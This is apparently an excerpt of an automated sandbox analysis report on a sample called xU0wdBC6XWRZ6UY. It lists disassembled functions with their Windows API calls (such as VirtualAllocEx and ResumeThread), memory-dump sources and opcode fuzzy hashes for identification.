                                                          Function 07CF5BE0 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 12f4ae274065397ce60629d4d0bb6a958220aa4bf61de01aeea7595d6f44c3b1
                                                          • Instruction ID: 8ca9f93590e2e26c0cae6c29b27dfef5c5d5e35ed5b1d2f11d482cfbf992b2be
                                                          • Opcode Fuzzy Hash: 12f4ae274065397ce60629d4d0bb6a958220aa4bf61de01aeea7595d6f44c3b1
                                                          • Instruction Fuzzy Hash: 921149B1D003498FDB24DFAAD8457EEFBF5EB48320F248419D519A7640CA79A941CBA4
                                                          Function 018FA7D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018FB719,00000800,00000000,00000000), ref: 018FB90A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 5632893fda051b9658d23a6a72ba03d64ab8ea9bde7f7842389a14234f0e7169
                                                          • Instruction ID: c01eefd7edbbc79e466e1712712d2fe053558f41867523f9f16308ab1b03d1fb
                                                          • Opcode Fuzzy Hash: 5632893fda051b9658d23a6a72ba03d64ab8ea9bde7f7842389a14234f0e7169
                                                          • Instruction Fuzzy Hash: CE1103B6D003499FDB20DF9AC444B9EFBF4EB88310F10842EDA19A7240C375A945CFA4
                                                          Function 07CF61A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07CF6216
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: e1d78039358d03395f1287df62d5a444c909f397c873e8d24a36e91ecae10070
                                                          • Instruction ID: 2f950dc13ed71daa5a79b9640bb18e9e9a825e867281fde484d0d173795a1e6d
                                                          • Opcode Fuzzy Hash: e1d78039358d03395f1287df62d5a444c909f397c873e8d24a36e91ecae10070
                                                          • Instruction Fuzzy Hash: 1E112671D003499FDB20DFAAC845BDEBBF5EF48320F148819E515A7250CB75A941CFA1
                                                          Function 018FB898 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018FB719,00000800,00000000,00000000), ref: 018FB90A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 6bf6bd108e244e3b50f0aef684f3f61cef724e7e552928e8d09d393d15a01546
                                                          • Instruction ID: 14f75c3e92872b077f1bbb45462870fe7df78f76141b0ab6a1241f328a6b2213
                                                          • Opcode Fuzzy Hash: 6bf6bd108e244e3b50f0aef684f3f61cef724e7e552928e8d09d393d15a01546
                                                          • Instruction Fuzzy Hash: 1A1100B6D003098FDB20CF9AC444B9EFBF4AF48310F10842ED919A7240C379AA45CFA4
                                                          Function 07CF8D08 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07CF8D6D
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 3dc650277c062e0054f04f97ae3b199d979b22c26bd65e635c9ec2ca54d6195a
                                                          • Instruction ID: b1d596046b04bd5ff43d150b1e30d9030bdc32885e0ee3c92b0122fa44b56fff
                                                          • Opcode Fuzzy Hash: 3dc650277c062e0054f04f97ae3b199d979b22c26bd65e635c9ec2ca54d6195a
                                                          • Instruction Fuzzy Hash: BD1103B58003499FDB20DF9AD885BDEFFF8EB48320F10841AE518A7640C375A944CFA1
                                                          Function 07CF5BE8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: e14ef87fdd6afd197ae368335be0314bd651ed55f7004513a808cb743eeb8108
                                                          • Instruction ID: e4f876e6eb4d811afd5db79ab588f18161fa960e12818015b8b7b4cc419f6987
                                                          • Opcode Fuzzy Hash: e14ef87fdd6afd197ae368335be0314bd651ed55f7004513a808cb743eeb8108
                                                          • Instruction Fuzzy Hash: 61113AB1D003498FDB24DFAAC44579EFBF5EF48324F148419D559A7240CB75A941CFA4
                                                          Function 07CF867C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 07CF8D6D
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 040dea3055382e080113c5ad8222c2405684f512a7252cf19ada9c119c0bcddf
                                                          • Instruction ID: ad6440f9f5e6b25831a3e031c59a5441d79ed0a96ba12c003ce8a76776eeeae7
                                                          • Opcode Fuzzy Hash: 040dea3055382e080113c5ad8222c2405684f512a7252cf19ada9c119c0bcddf
                                                          • Instruction Fuzzy Hash: AC1106B58003499FDB20DF9AC485BDEFBF8EF48320F14841AE518A7240C375A944CFA5
                                                          Function 0650E600 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0650E658
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301819183.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_6500000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: ChangeCloseFindNotification
                                                          • String ID:
                                                          • API String ID: 2591292051-0
                                                          • Opcode ID: c459f39ed14dfa1d03ed447de7a990967e5949e30f7c5568e4353767723c7cb5
                                                          • Instruction ID: a0ba34a1a3a754820d7a85d1e2233c519a5529de9e13a6512406714f0a91c0c9
                                                          • Opcode Fuzzy Hash: c459f39ed14dfa1d03ed447de7a990967e5949e30f7c5568e4353767723c7cb5
                                                          • Instruction Fuzzy Hash: D41103B5C003498FDB20DF9AD545BDEBBF4EB48320F20841AD968A7280D779A945CFA5
                                                          Function 018FB638 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 018FB69E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1296482504.00000000018F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_18f0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: f532028897d0541749df8fc576698fb76ab7b87a96c5e4283ed721f1b17ba9c1
                                                          • Instruction ID: 5ebb75880c04a7af9e84f02b0c0599585e008be0411d10d8c70a6d46274d23b7
                                                          • Opcode Fuzzy Hash: f532028897d0541749df8fc576698fb76ab7b87a96c5e4283ed721f1b17ba9c1
                                                          • Instruction Fuzzy Hash: F611DFB5C003498FDB20DF9AC444A9EFBF5AF88324F10842AD929A7250D379A645CFA5
                                                          Function 07C95343 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: A
                                                          • API String ID: 0-3554254475
                                                          • Opcode ID: a30d886f9adb88dc8607d7c8a623c02e2736bee5b6a9a903079d1ba53ffad9ee
                                                          • Instruction ID: 52569c287afe4414626055306b6e0f2f390906b14c4a20468bf39dcf25a32f78
                                                          • Opcode Fuzzy Hash: a30d886f9adb88dc8607d7c8a623c02e2736bee5b6a9a903079d1ba53ffad9ee
                                                          • Instruction Fuzzy Hash: 69F0F2B0A09244DFCFC7D76454554A97FB56F8714030984FAD005CB1E2DA218D17A752
                                                          Function 07C90040 Relevance: .8, Instructions: 761COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4db970a5d474a021c6b5789b1372de2ee9df4631a87ff1c6e35d317a64e27e98
                                                          • Instruction ID: eb403fb06d3c75c57cabb0e8ab0f7be50cf9a75933c617c366e3f0b1a22833b9
                                                          • Opcode Fuzzy Hash: 4db970a5d474a021c6b5789b1372de2ee9df4631a87ff1c6e35d317a64e27e98
                                                          • Instruction Fuzzy Hash: E062B2F0D01B438ADBB49FB4D5CC3AD77A1AB45309F604A2ED5BACA790D7349682CB05
                                                          Function 07C90006 Relevance: .5, Instructions: 475COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c52ccdd15be727c60a14760b3ecba59ee08a74cda722c53b1463e02e3bcf9ad8
                                                          • Instruction ID: 1ddc45b9f5c03c1ec22e28c2e78ec3faae4498bb3dfe91577d558a0b006ddd35
                                                          • Opcode Fuzzy Hash: c52ccdd15be727c60a14760b3ecba59ee08a74cda722c53b1463e02e3bcf9ad8
                                                          • Instruction Fuzzy Hash: 03224BF0906B434ADBB45BA4C4C839EB790AB06318F704A6FC4FA8A755D73491C7DB4A
                                                          Function 07C98B6B Relevance: .2, Instructions: 220COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14201e99ef4258fb70aefd82d59aaa767db8e6e27a3a1215b427d7c314bb2a30
                                                          • Instruction ID: 4e7bdd4df2e24addd91ec66461d8a1c2931a5fd2b25e1290603fb304ab9c0b2b
                                                          • Opcode Fuzzy Hash: 14201e99ef4258fb70aefd82d59aaa767db8e6e27a3a1215b427d7c314bb2a30
                                                          • Instruction Fuzzy Hash: FE7104F091D395CFCB46CB6A98589A97FF8BF4B201F4594E6C188DB2A3C3349805CB12
                                                          Function 07C9508E Relevance: .2, Instructions: 167COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d73f7b6f4329a93e30262ccc6ebea51941434831fa5be93af06ab37dbb5e6804
                                                          • Instruction ID: eb4774382ce6e046a4698e790f27b9dd48685d37d99dae19318fe0ef0a766804
                                                          • Opcode Fuzzy Hash: d73f7b6f4329a93e30262ccc6ebea51941434831fa5be93af06ab37dbb5e6804
                                                          • Instruction Fuzzy Hash: 6D519234B00115CFD769AB75E859B6A77A7FFC8751F208028E50ADB3C9CE349C029B92
                                                          Function 07C98D89 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8697e54b3b5d560e70ad9eec2e71872243685f47913270d9527e5a1c27f154f
                                                          • Instruction ID: 6d7408d0fbecbb6f69d1dd5194b91975b47b88944e9678a303d55107d08834f4
                                                          • Opcode Fuzzy Hash: b8697e54b3b5d560e70ad9eec2e71872243685f47913270d9527e5a1c27f154f
                                                          • Instruction Fuzzy Hash: 4C51FCB8D1921ADFCF80CFAAD4988EDBBF5BB0F241F009466E416E7315D73499118B64
                                                          Function 07C94D30 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 925e80fa89b4e470e213ba3ede1c255e101f126017bb5348c71cad2c7e2194a3
                                                          • Instruction ID: 43205e44eceb382bcdf68ae136d1f4c81044e689bedd4b0050975347de8c3c4a
                                                          • Opcode Fuzzy Hash: 925e80fa89b4e470e213ba3ede1c255e101f126017bb5348c71cad2c7e2194a3
                                                          • Instruction Fuzzy Hash: 1851E4B1B002068FCB55DF79D88896EBBF7FFC42207148929E42ADB350EB309D058791
                                                          Function 07C98D98 Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: da9bff3021824545ee6d22834b2ce57968de28ae4b1d50b01ad60e794f50ac89
                                                          • Instruction ID: af91f6f271896781107b9abb04e652113f364cb3fe7f271a3859063d4b273c90
                                                          • Opcode Fuzzy Hash: da9bff3021824545ee6d22834b2ce57968de28ae4b1d50b01ad60e794f50ac89
                                                          • Instruction Fuzzy Hash: 6F51ECB8E1911ADFCF90CFAAD4988EDBBF5BB0F241F009466D816E7305D73499118B64
                                                          Function 07C9FDB0 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cf8074fd3ed44d75b383fceae301481cc55bf4b480699f039434a5d00d0f7512
                                                          • Instruction ID: aa69faea0ec0530d941ea3ac3f3c4c4f55ee0e49a71f1cbd0974a9a8b6751f10
                                                          • Opcode Fuzzy Hash: cf8074fd3ed44d75b383fceae301481cc55bf4b480699f039434a5d00d0f7512
                                                          • Instruction Fuzzy Hash: B05118B4E15209CFDF44CFA6C9486EDBBF6BF8A300F14902DD41AAB255EB709945CB50
                                                          Function 07C99911 Relevance: .1, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c9b685db31f5b70e462561e73d23d6d3ab0cdb6cae0c1ce429b9738c34bd511
                                                          • Instruction ID: 8b11fd6861000c42b7d614f33f21741da3513e3b4b279ea802cc254a49208d40
                                                          • Opcode Fuzzy Hash: 3c9b685db31f5b70e462561e73d23d6d3ab0cdb6cae0c1ce429b9738c34bd511
                                                          • Instruction Fuzzy Hash: 6041C5B4D19218CFDF50CFA6D488AEDBBF9FF8A311F146129E40AA7251C734A941CB14
                                                          Function 07C94E78 Relevance: .1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a49141b0b682e376671dd71039475a67703c4d82fe82da8f4a9ca7496f1c304
                                                          • Instruction ID: e36f587a4f3d86c12496f77aa2604e9c304461a960251d8398f6acc0d8d90a32
                                                          • Opcode Fuzzy Hash: 6a49141b0b682e376671dd71039475a67703c4d82fe82da8f4a9ca7496f1c304
                                                          • Instruction Fuzzy Hash: 6E41B4B4B011168BD799AF68D45976F37A7FBC8354F204138F60A9B3C8CE388D064B92
                                                          Function 07C9CE70 Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f407162e9faf0a584747a02f4a27f3dde3be73442f72baed3098631b8791508b
                                                          • Instruction ID: 93c81404b266bd7e267ec965de72270dd88a875a3b2b1aa8fa764d0440724736
                                                          • Opcode Fuzzy Hash: f407162e9faf0a584747a02f4a27f3dde3be73442f72baed3098631b8791508b
                                                          • Instruction Fuzzy Hash: 9741C8B0E0011A8FDB95EBB4D8456BF7BB6FBC8314F208065E51AAB385D7344D01DBA2
                                                          Function 07C94E88 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19ed954819ebdf14336b8666a63cd45c066691d88426e490e352b7783235d919
                                                          • Instruction ID: 529cd7c9baa5ef1752c4ec46810676fc1b2d7df1020ede855ace0079ad757da8
                                                          • Opcode Fuzzy Hash: 19ed954819ebdf14336b8666a63cd45c066691d88426e490e352b7783235d919
                                                          • Instruction Fuzzy Hash: 5F419574B011168BD799AF69D45976F36A7FBC8354F204139F60AAF3C8DE388C058B92
                                                          Function 07C98C58 Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4551306025463476faf955193fe70572e0fa1b5bf61f75ab4110a2489beb7c6d
                                                          • Instruction ID: cf05ffa1e2084cb7410f3a14d1bb13c83e798428d1c025b30cc27c75f6605908
                                                          • Opcode Fuzzy Hash: 4551306025463476faf955193fe70572e0fa1b5bf61f75ab4110a2489beb7c6d
                                                          • Instruction Fuzzy Hash: 674128B4A1961ACFCB84CF5AD4889BEBBF9BF4F300F4194A5C0199B226D730D9118B10
                                                          Function 07C9C2C0 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 684a93aab7a9f8a306dcc8145e0f379656e1a62ad1ded676be8c446b86821010
                                                          • Instruction ID: 3f3a43b625198653855af17b227a8f92443e34471e17ce4ace78d29d117cefe5
                                                          • Opcode Fuzzy Hash: 684a93aab7a9f8a306dcc8145e0f379656e1a62ad1ded676be8c446b86821010
                                                          • Instruction Fuzzy Hash: 3F3104B1A0D384AFDF56CB709C958AE7FF8DF42110B1480EBE845CB262E6349E059362
                                                          Function 07C9AF1C Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e20165006406010108b8d5630688862367f2a70e5ab1b50e10ae1994000ef92f
                                                          • Instruction ID: 6ba2867b140c301b6af975d94cc620f241e6ce8b1752067d2f81ed00f6154a10
                                                          • Opcode Fuzzy Hash: e20165006406010108b8d5630688862367f2a70e5ab1b50e10ae1994000ef92f
                                                          • Instruction Fuzzy Hash: 3C314AB5900309AFCF20DFAAD845ADEBFF5EB48310F10842AE815A7250D735A941CBA5
                                                          Function 07C9CEA0 Relevance: .1, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 45025051114c3d2719b142ee56de1bde08409e2e639ca9d5576c76eb1e090914
                                                          • Instruction ID: 606f02edc067a6c7d956dc25a3288cd6d6ed5e01af5511ee097f589bfbe52345
                                                          • Opcode Fuzzy Hash: 45025051114c3d2719b142ee56de1bde08409e2e639ca9d5576c76eb1e090914
                                                          • Instruction Fuzzy Hash: 9A3162B5E0001A8FDB94EFA9D8457AF77B6FBC8314F204028E51AAB384D6345D41DFA2
                                                          Function 07C91068 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ed5f0f0feeebb4570ad14121a9f7e892931b56f0b022d5752a9bc84dee96573
                                                          • Instruction ID: 7f901936349ffb37b50cf01848f153e74445bd368addae7a420ecc2e595f8d0d
                                                          • Opcode Fuzzy Hash: 3ed5f0f0feeebb4570ad14121a9f7e892931b56f0b022d5752a9bc84dee96573
                                                          • Instruction Fuzzy Hash: BF21B075B102168FCF98DB29D45896E77E9EFC962171940BAD905CB360DE32ED01CBA0
                                                          Function 0158D36C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1295423903.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_158d000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ecdf9f2a33b6c9054a2ca2cff741b53289a1471a57e2ca8cf360febb058ed920
                                                          • Instruction ID: 8b90c0c5642b461c9b04a26da9e01ae30afe4640fdfda499dd892dcf392d7afa
                                                          • Opcode Fuzzy Hash: ecdf9f2a33b6c9054a2ca2cff741b53289a1471a57e2ca8cf360febb058ed920
                                                          • Instruction Fuzzy Hash: D82100716043009FDB05EF98D9C4B2ABBF1FB84224F20C96DE8095E292C776D846CA62
                                                          Function 0158D1B4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1295423903.000000000158D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0158D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_158d000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1024449342e83ee602cc42ff229c3aa95b110f105cc1eb6dfcda26aef3c59464
                                                          • Instruction ID: effcfff7cb2e9e86b28e16ebcff268e5efd23a65c4faf982615a102a21f95e17
                                                          • Opcode Fuzzy Hash: 1024449342e83ee602cc42ff229c3aa95b110f105cc1eb6dfcda26aef3c59464
                                                          • Instruction Fuzzy Hash: 1B21D0716043049FDB05EF94D9C0B2ABBF5FB84324F20C9ADE84A5F292C336D846CA61
                                                          Function 07C911C9 Relevance: .1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7eafd9aabe4faaaecbc23a8936f9133d01100b71774e058c6d096a681bda6767
                                                          • Instruction ID: 620e111548df2a1d734cab249898fe3b44a5772ceb0a6e4fb03d7e9c794a80dc
                                                          • Opcode Fuzzy Hash: 7eafd9aabe4faaaecbc23a8936f9133d01100b71774e058c6d096a681bda6767
                                                          • Instruction Fuzzy Hash: 4C214B75A0011ADFCF94EBA4C8999ED77B2FF8C315F1440A8E401AB3A0CB369D01CB60
                                                          Function 07C9D670 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
